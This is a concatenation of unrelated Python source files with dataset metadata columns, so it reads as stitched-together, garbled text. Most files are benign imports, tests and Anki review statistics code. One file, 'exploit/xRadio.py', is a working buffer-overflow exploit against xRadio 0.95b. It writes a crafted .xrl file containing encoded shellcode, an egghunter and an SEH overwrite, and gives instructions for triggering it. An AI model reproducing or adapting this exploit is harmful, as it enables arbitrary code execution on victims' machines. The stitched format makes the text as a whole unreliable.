] | 5 | 2015-03-18T01:19:56.000Z | 2020-10-23T12:44:47.000Z | modules/sdl2/__init__.py | rave-engine/rave | 0eeb956363f4d7eda92350775d7d386550361273 | [
"BSD-2-Clause"
] | null | null | null | modules/sdl2/__init__.py | rave-engine/rave | 0eeb956363f4d7eda92350775d7d386550361273 | [
"BSD-2-Clause"
] | null | null | null | from . import audio, video, input, image
| 14 | 40 | 0.714286 | 6 | 42 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 42 | 2 | 41 | 21 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cbdb070163c31abc19944c853dd7a7b886cc7def | 65 | py | Python | tests/io/file_stdio.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 3,010 | 2017-01-07T23:43:33.000Z | 2022-03-31T06:02:59.000Z | tests/io/file_stdio.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 4,478 | 2017-01-06T01:35:02.000Z | 2022-03-31T23:03:27.000Z | tests/io/file_stdio.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 1,149 | 2017-01-09T00:35:23.000Z | 2022-03-31T21:24:29.000Z | import sys
print(sys.stdin.fileno())
print(sys.stdout.fileno())
| 13 | 26 | 0.738462 | 10 | 65 | 4.8 | 0.6 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 65 | 4 | 27 | 16.25 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
1dca0ecdde1581a92cd7cd5dc97fddfb948f3e20 | 135 | py | Python | include/tclap-1.4.0-rc1/tests/test65.py | SpaceKatt/cpp-cli-poc | 02ffefea2fc6e999fa2b27d08a8b3be6830b1b97 | [
"BSL-1.0"
] | 62 | 2021-09-21T18:58:02.000Z | 2022-03-07T02:17:43.000Z | third_party/tclap-1.4.0-rc1/tests/test65.py | Vertexwahn/FlatlandRT | 37d09fde38b25eff5f802200b43628efbd1e3198 | [
"Apache-2.0"
] | null | null | null | third_party/tclap-1.4.0-rc1/tests/test65.py | Vertexwahn/FlatlandRT | 37d09fde38b25eff5f802200b43628efbd1e3198 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import simple_test
simple_test.test("test12", ["-v", "1 2 3", "-v", "4 5 6", "-v", "7 8 9", "-v", "-1 0.2 0.4", ])
| 22.5 | 95 | 0.503704 | 28 | 135 | 2.357143 | 0.642857 | 0.30303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 0.17037 | 135 | 5 | 96 | 27 | 0.446429 | 0.118519 | 0 | 0 | 0 | 0 | 0.330508 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
1deb1417c7ca3ed6d620b650d652f2268c866570 | 165 | py | Python | ape_vyper/__init__.py | NotPeopling2day/ape-vyper | 96a22e67728489511865e0c1ee712b3394b133c2 | [
"Apache-2.0"
] | 6 | 2021-05-12T23:18:36.000Z | 2022-03-24T09:22:23.000Z | ape_vyper/__init__.py | NotPeopling2day/ape-vyper | 96a22e67728489511865e0c1ee712b3394b133c2 | [
"Apache-2.0"
] | 19 | 2021-05-12T16:54:02.000Z | 2022-03-02T14:20:20.000Z | ape_vyper/__init__.py | NotPeopling2day/ape-vyper | 96a22e67728489511865e0c1ee712b3394b133c2 | [
"Apache-2.0"
] | 3 | 2021-05-12T21:01:54.000Z | 2022-01-21T22:21:38.000Z | from ape import plugins
from .compiler import VyperCompiler
@plugins.register(plugins.CompilerPlugin)
def register_compiler():
return (".vy",), VyperCompiler
| 18.333333 | 41 | 0.775758 | 18 | 165 | 7.055556 | 0.611111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.127273 | 165 | 8 | 42 | 20.625 | 0.881944 | 0 | 0 | 0 | 0 | 0 | 0.018182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
38279ea4cc6f8cd988b5316eb8734529eb594954 | 85 | py | Python | src/datasets/common/__init__.py | PranavEranki/SSD-Algorithm | 778c8be06ad75c6dfbe98660fb32ef4cacb7ce4a | [
"MIT"
] | null | null | null | src/datasets/common/__init__.py | PranavEranki/SSD-Algorithm | 778c8be06ad75c6dfbe98660fb32ef4cacb7ce4a | [
"MIT"
] | null | null | null | src/datasets/common/__init__.py | PranavEranki/SSD-Algorithm | 778c8be06ad75c6dfbe98660fb32ef4cacb7ce4a | [
"MIT"
] | 1 | 2020-02-23T00:40:08.000Z | 2020-02-23T00:40:08.000Z |
from .dataset_source import DatasetSource
from .dataset_writer import DatasetWriter
| 21.25 | 41 | 0.870588 | 10 | 85 | 7.2 | 0.7 | 0.305556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105882 | 85 | 3 | 42 | 28.333333 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
382b755d02e0f1bbd5ba82c0fa4e529b27642b1f | 4,251 | py | Python | exploit/xRadio.py | NotFoundHacker/KaliExploit | 9a87798938c8f0b7754d0e7ffe20a186b552adc7 | [
"MIT"
] | null | null | null | exploit/xRadio.py | NotFoundHacker/KaliExploit | 9a87798938c8f0b7754d0e7ffe20a186b552adc7 | [
"MIT"
] | null | null | null | exploit/xRadio.py | NotFoundHacker/KaliExploit | 9a87798938c8f0b7754d0e7ffe20a186b552adc7 | [
"MIT"
] | null | null | null | #!/usr/bin/python
#
from core import logger
#
# windows/messagebox - 590 bytes
# x86/alpha_upper
#
"""
This module exploits a buffer overflow in xRadio 0.95b. Using the
application to import a specially crafted xrl file, a buffer
overflow occurs allowing arbitrary code execution."""
class Exploit:
config={
}
def show_options(self):
print(Fore.YELLOW+"Options"+Style.RESET_ALL)
print(Fore.YELLOW+"-------"+Style.RESET_ALL)
for key in sorted(self.config.keys()):
print(Fore.YELLOW+key,":",self.get_config(key)+Style.RESET_ALL)
@staticmethod
def show_info():
logger.info("\nThis exploit tries to do a buffer \noverflow to xRadio type run\n to generate file")
def set_config(self, key, value):
if key in self.config.keys():
self.config[key] = value
else:
logger.error("No options")
def get_config(self, key):
return self.config[key]
@staticmethod
def run():
shellcode = ("\x89\xe1\xd9\xd0\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x58\x59\x5a\x4b\x4d\x4b\x58\x59\x54"
"\x34\x47\x54\x4c\x34\x50\x31\x58\x52\x4e\x52\x43\x47\x50\x31"
"\x58\x49\x52\x44\x4c\x4b\x52\x51\x56\x50\x4c\x4b\x54\x36\x54"
"\x4c\x4c\x4b\x54\x36\x45\x4c\x4c\x4b\x51\x56\x43\x38\x4c\x4b"
"\x43\x4e\x47\x50\x4c\x4b\x56\x56\x50\x38\x50\x4f\x45\x48\x52"
"\x55\x5a\x53\x51\x49\x45\x51\x58\x51\x4b\x4f\x4b\x51\x43\x50"
"\x4c\x4b\x52\x4c\x51\x34\x47\x54\x4c\x4b\x50\x45\x47\x4c\x4c"
"\x4b\x50\x54\x56\x48\x43\x48\x45\x51\x4b\x5a\x4c\x4b\x51\x5a"
"\x45\x48\x4c\x4b\x50\x5a\x51\x30\x45\x51\x5a\x4b\x4d\x33\x50"
"\x34\x51\x59\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x5a\x4e\x56\x51"
"\x4b\x4f\x50\x31\x49\x50\x4b\x4c\x4e\x4c\x4d\x54\x4f\x30\x43"
"\x44\x45\x57\x4f\x31\x58\x4f\x54\x4d\x43\x31\x49\x57\x5a\x4b"
"\x4c\x34\x47\x4b\x43\x4c\x56\x44\x51\x38\x54\x35\x4b\x51\x4c"
"\x4b\x50\x5a\x56\x44\x45\x51\x5a\x4b\x52\x46\x4c\x4b\x54\x4c"
"\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x5a\x4b\x4c\x4b\x43"
"\x34\x4c\x4b\x45\x51\x4b\x58\x4d\x59\x51\x54\x56\x44\x45\x4c"
"\x45\x31\x58\x43\x4f\x42\x45\x58\x51\x39\x49\x44\x4b\x39\x4d"
"\x35\x4b\x39\x49\x52\x43\x58\x4c\x4e\x50\x4e\x54\x4e\x5a\x4c"
"\x51\x42\x4d\x38\x4d\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4c\x49\x51"
"\x55\x54\x44\x4f\x4b\x43\x4e\x4e\x38\x4d\x32\x43\x43\x4b\x37"
"\x45\x4c\x56\x44\x56\x32\x5a\x48\x4c\x4e\x4b\x4f\x4b\x4f\x4b"
"\x4f\x4b\x39\x51\x55\x45\x58\x43\x58\x52\x4c\x52\x4c\x51\x30"
"\x47\x31\x43\x58\x56\x53\x47\x42\x56\x4e\x45\x34\x43\x58\x52"
"\x55\x54\x33\x45\x35\x52\x52\x4b\x38\x51\x4c\x56\x44\x54\x4a"
"\x4d\x59\x4d\x36\x50\x56\x4b\x4f\x51\x45\x54\x44\x4c\x49\x58"
"\x42\x56\x30\x4f\x4b\x4e\x48\x4e\x42\x50\x4d\x4f\x4c\x4c\x47"
"\x45\x4c\x51\x34\x50\x52\x5a\x48\x43\x51\x4b\x4f\x4b\x4f\x4b"
"\x4f\x45\x38\x43\x52\x52\x52\x51\x48\x47\x50\x45\x38\x52\x43"
"\x52\x4f\x52\x4d\x56\x4e\x52\x48\x43\x55\x43\x55\x52\x4b\x56"
"\x4e\x52\x48\x45\x37\x52\x4f\x43\x44\x52\x47\x50\x31\x49\x4b"
"\x4c\x48\x51\x4c\x56\x44\x54\x4e\x4c\x49\x5a\x43\x52\x48\x52"
"\x4c\x43\x58\x50\x30\x56\x38\x43\x58\x45\x32\x56\x50\x52\x54"
"\x43\x55\x50\x31\x49\x59\x4b\x38\x50\x4c\x47\x54\x45\x57\x4c"
"\x49\x4b\x51\x56\x51\x58\x52\x43\x5a\x47\x30\x50\x53\x50\x51"
"\x51\x42\x4b\x4f\x58\x50\x56\x51\x49\x50\x56\x30\x4b\x4f\x50"
"\x55\x43\x38\x41\x41")
junk = "\x41" * 3248
tag = "\x77\x30\x30\x74\x77\x30\x30\x74"
nops = "\x90" * 230
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
nseh = "\xeb\x88\x90\x90"
seh = "\x82\xe2\x47\x00"
junk2 = "\x42" * 884
try:
file = open('b0t.xrl','w');
file.write(junk+tag+shellcode+nops+egghunter+nseh+seh+junk2);
file.close();
print("[+] b0t.xrl created.")
print("[+] Open xRadio.exe...")
print("[+] and Radios >> Edit List >> Save radio list")
print("[+] Select the *.xrl file, press Yes and boom!!\n")
except:
print("\n[-] Error.. Can't write file to system.\n")
| 41.271845 | 101 | 0.668313 | 842 | 4,251 | 3.36342 | 0.206651 | 0.038136 | 0.025424 | 0.025424 | 0.038136 | 0.021186 | 0 | 0 | 0 | 0 | 0 | 0.287296 | 0.107504 | 4,251 | 102 | 102 | 41.676471 | 0.459146 | 0.01482 | 0 | 0.025316 | 0 | 0.518987 | 0.715966 | 0.625626 | 0 | 1 | 0 | 0 | 0 | 1 | 0.063291 | false | 0 | 0.012658 | 0.012658 | 0.113924 | 0.101266 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
384236e370b45275685506bccd09da961477be46 | 233 | py | Python | exquiro/models/class_diagram/attribute.py | xhusar2/conceptual_model_parser | 63eea4ab8b967a6d2ee612ffb4a06b93e97d0043 | [
"MIT"
] | null | null | null | exquiro/models/class_diagram/attribute.py | xhusar2/conceptual_model_parser | 63eea4ab8b967a6d2ee612ffb4a06b93e97d0043 | [
"MIT"
] | null | null | null | exquiro/models/class_diagram/attribute.py | xhusar2/conceptual_model_parser | 63eea4ab8b967a6d2ee612ffb4a06b93e97d0043 | [
"MIT"
] | null | null | null |
class Attribute:
name = ""
id = ""
attributes = []
def __init__(self, attrib_id, name):
self.name = name
self.id = attrib_id
def __str__(self):
return f'id:{self.id} name: {self.name}'
| 16.642857 | 48 | 0.540773 | 29 | 233 | 4 | 0.413793 | 0.206897 | 0.172414 | 0.241379 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.321888 | 233 | 13 | 49 | 17.923077 | 0.734177 | 0 | 0 | 0 | 0 | 0 | 0.12987 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0 | 0.111111 | 0.777778 | 0 | 1 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
69d3a8ab2872b70adc61bba4d49a0fadf1054651 | 25 | py | Python | __init__.py | vishalbelsare/RLS | 877358be0671129bf5c31aedbdf31bed38e9297a | [
"MIT"
] | 1 | 2021-07-24T18:13:00.000Z | 2021-07-24T18:13:00.000Z | __init__.py | vishalbelsare/RLS | 877358be0671129bf5c31aedbdf31bed38e9297a | [
"MIT"
] | null | null | null | __init__.py | vishalbelsare/RLS | 877358be0671129bf5c31aedbdf31bed38e9297a | [
"MIT"
] | 1 | 2021-07-24T18:13:01.000Z | 2021-07-24T18:13:01.000Z | from RLS.RLS import RLS
| 12.5 | 24 | 0.76 | 5 | 25 | 3.8 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 25 | 1 | 25 | 25 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
69d879d34b083c6f145914643ec4b88f44e5bd04 | 30 | py | Python | primer/module.py | YunYouJun/python-learn | e41ce8ca289fbb6e1a14e07aee6d4b797e6d5d8c | [
"MIT"
] | null | null | null | primer/module.py | YunYouJun/python-learn | e41ce8ca289fbb6e1a14e07aee6d4b797e6d5d8c | [
"MIT"
] | null | null | null | primer/module.py | YunYouJun/python-learn | e41ce8ca289fbb6e1a14e07aee6d4b797e6d5d8c | [
"MIT"
] | null | null | null | from math import pi
print(pi)
| 10 | 19 | 0.766667 | 6 | 30 | 3.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 30 | 2 | 20 | 15 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
69fbbaee70c4c46e85c50e9ae7cd23771cea7460 | 310 | py | Python | Package Bundler.py | STPackageBundler/package-bundler | 6c2a97f7b1db2dc5d6afff72557c09927095d851 | [
"MIT"
] | 7 | 2015-01-24T05:22:31.000Z | 2018-07-12T07:30:46.000Z | Package Bundler.py | STPackageBundler/package-bundler | 6c2a97f7b1db2dc5d6afff72557c09927095d851 | [
"MIT"
] | null | null | null | Package Bundler.py | STPackageBundler/package-bundler | 6c2a97f7b1db2dc5d6afff72557c09927095d851 | [
"MIT"
] | null | null | null | from .package_bundler.commands.load import PackageBundlerLoadCommand
from .package_bundler.commands.manager import PackageBundlerManagerCommand
from .package_bundler.commands.create import PackageBundlerCreateBundleCommand
from .package_bundler.events_listeners.project_loader import ProjectLoaderEventListener | 77.5 | 87 | 0.912903 | 30 | 310 | 9.233333 | 0.533333 | 0.158845 | 0.259928 | 0.281588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.048387 | 310 | 4 | 87 | 77.5 | 0.938983 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3858b41dd95dee29fa3d8ad28d00fdf8453285d4 | 27 | py | Python | tests/test_diss.py | mvcisback/DISS | 3ac94d62d2f10e2642a5ea7ef27b1ed045664abc | [
"MIT"
] | null | null | null | tests/test_diss.py | mvcisback/DISS | 3ac94d62d2f10e2642a5ea7ef27b1ed045664abc | [
"MIT"
] | null | null | null | tests/test_diss.py | mvcisback/DISS | 3ac94d62d2f10e2642a5ea7ef27b1ed045664abc | [
"MIT"
] | null | null | null | def test_smoke():
pass
| 9 | 17 | 0.62963 | 4 | 27 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.259259 | 27 | 2 | 18 | 13.5 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
389e5cfb89c3ee3cd5c0cd63b9d29182b8d8435e | 87 | py | Python | backend/users/tests.py | NumanIbnMazid/numanibnmazid.com | 905e3afab285316d88bafa30dc080dfbb0611731 | [
"MIT"
] | 1 | 2022-01-28T18:20:19.000Z | 2022-01-28T18:20:19.000Z | backend/users/tests.py | NumanIbnMazid/numanibnmazid.com | 905e3afab285316d88bafa30dc080dfbb0611731 | [
"MIT"
] | null | null | null | backend/users/tests.py | NumanIbnMazid/numanibnmazid.com | 905e3afab285316d88bafa30dc080dfbb0611731 | [
"MIT"
] | null | null | null | # import test cases
from users.test_cases.user_test_cases import UserTestCase # NOQA
| 21.75 | 65 | 0.816092 | 13 | 87 | 5.230769 | 0.615385 | 0.397059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 87 | 3 | 66 | 29 | 0.906667 | 0.252874 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
38b5485bd4c08353afb9b1a765fa78134b2a3049 | 77 | py | Python | quantipy/core/tools/view/__init__.py | encount/quantipy3 | 01fe350b79594ba162cd48ce91f6e547e74265fe | [
"MIT"
] | null | null | null | quantipy/core/tools/view/__init__.py | encount/quantipy3 | 01fe350b79594ba162cd48ce91f6e547e74265fe | [
"MIT"
] | null | null | null | quantipy/core/tools/view/__init__.py | encount/quantipy3 | 01fe350b79594ba162cd48ce91f6e547e74265fe | [
"MIT"
] | null | null | null | from . import agg
from . import meta
from . import struct
from . import query | 19.25 | 20 | 0.753247 | 12 | 77 | 4.833333 | 0.5 | 0.689655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194805 | 77 | 4 | 21 | 19.25 | 0.935484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2a627d577441bd87ff76b1f7fd715d75193c3aa1 | 177 | py | Python | modules/rapids_modules/transform/data_obj.py | goosen78/gQuant | cc0bff4ac524ccfbe8097acd647a8b3fad5fe578 | [
"Apache-2.0"
] | null | null | null | modules/rapids_modules/transform/data_obj.py | goosen78/gQuant | cc0bff4ac524ccfbe8097acd647a8b3fad5fe578 | [
"Apache-2.0"
] | null | null | null | modules/rapids_modules/transform/data_obj.py | goosen78/gQuant | cc0bff4ac524ccfbe8097acd647a8b3fad5fe578 | [
"Apache-2.0"
] | null | null | null | class NormalizationData(object):
def __init__(self, data):
self.data = data
class ProjectionData(object):
def __init__(self, data):
self.data = data
| 16.090909 | 32 | 0.649718 | 20 | 177 | 5.35 | 0.4 | 0.299065 | 0.242991 | 0.317757 | 0.616822 | 0.616822 | 0.616822 | 0.616822 | 0 | 0 | 0 | 0 | 0.248588 | 177 | 10 | 33 | 17.7 | 0.804511 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
aa5019510be8dcde3a8d23f7f8be5bc4a92c92d3 | 124 | py | Python | solutions/variance.py | jsamoocha/python-for-datascience | 1b8f8b96944eb23cce2b7200f66361dd223ce13e | [
"MIT"
] | null | null | null | solutions/variance.py | jsamoocha/python-for-datascience | 1b8f8b96944eb23cce2b7200f66361dd223ce13e | [
"MIT"
] | null | null | null | solutions/variance.py | jsamoocha/python-for-datascience | 1b8f8b96944eb23cce2b7200f66361dd223ce13e | [
"MIT"
] | null | null | null | def variance(numbers):
mu = sum(numbers) / len(numbers)
return sum([(n - mu) ** 2 for n in numbers]) / len(numbers)
| 31 | 63 | 0.612903 | 19 | 124 | 4 | 0.578947 | 0.263158 | 0.447368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010309 | 0.217742 | 124 | 3 | 64 | 41.333333 | 0.773196 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
aa5482072d2a74021ef1f149b710759a0ec7c8be | 216 | py | Python | Codewars/7kyu/complementary-dna/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | 7 | 2017-09-20T16:40:39.000Z | 2021-08-31T18:15:08.000Z | Codewars/7kyu/complementary-dna/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | Codewars/7kyu/complementary-dna/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | # Python - 3.6.0
Test.assert_equals(DNA_strand('AAAA'), 'TTTT', 'String AAAA is')
Test.assert_equals(DNA_strand('ATTGC'), 'TAACG', 'String ATTGC is')
Test.assert_equals(DNA_strand('GTAT'), 'CATA', 'String GTAT is')
| 36 | 67 | 0.708333 | 34 | 216 | 4.323529 | 0.5 | 0.204082 | 0.326531 | 0.387755 | 0.537415 | 0.367347 | 0 | 0 | 0 | 0 | 0 | 0.015306 | 0.092593 | 216 | 5 | 68 | 43.2 | 0.734694 | 0.064815 | 0 | 0 | 0 | 0 | 0.345 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aa65aeec14b5b9a13426da76359de50ea5eece36 | 3,538 | py | Python | ankistats/stats.py | nogira/anki-stats | 81fc4b11ff958d9844f95679a1fe596b2865d29c | [
"MIT"
] | null | null | null | ankistats/stats.py | nogira/anki-stats | 81fc4b11ff958d9844f95679a1fe596b2865d29c | [
"MIT"
] | null | null | null | ankistats/stats.py | nogira/anki-stats | 81fc4b11ff958d9844f95679a1fe596b2865d29c | [
"MIT"
] | null | null | null | from .tables import *
def stats_lapse_retention(
start_date: str = "",
end_date: str = ""
):
"""
Get the percentage of corrent answers.
Date input in the format of "DD-MM-YY"
"""
df = tbl_reviews()
if start_date:
date = pd.to_datetime(start_date, format="%d-%m-%y")
df = df[df.Review_ID > date]
if end_date:
date = pd.to_datetime(end_date, format="%d-%m-%y")
df = df[df.Review_ID < date]
track_lapses = []
wrong_count = 0
right_count = 0
def track_lapse_stats(row) -> None:
nonlocal track_lapses
nonlocal wrong_count
nonlocal right_count
is_relearning = row['Review_Type'] == 'Relearning'
if is_relearning:
track_lapses.append(row['Card_ID'])
# the very next review after card_ID is stored will be the first review
# after relearning
# however, to make sure the card hasnt seen reset to new, check the card
# isnt new (i.e. 'Learning'). if new, remove card from list
elif row['Card_ID'] in track_lapses:
if row['Review_Type'] == 'Learning':
track_lapses.remove(row['Card_ID'])
elif row['Review_Answer'] == 'Wrong':
wrong_count += 1
else:
right_count += 1
track_lapses.remove(row['Card_ID'])
df.apply(track_lapse_stats, axis=1)
print("Right:", right_count)
print("Wrong:", wrong_count)
print("Fraction Correct:", right_count / (right_count + wrong_count))
def stats_learning_graduation_retention(
graduation_interval,
pre_graduation_interval,
start_date: str = "",
end_date: str = ""
):
"""
Get the percentage of corrent answers on learning graduation intervals.
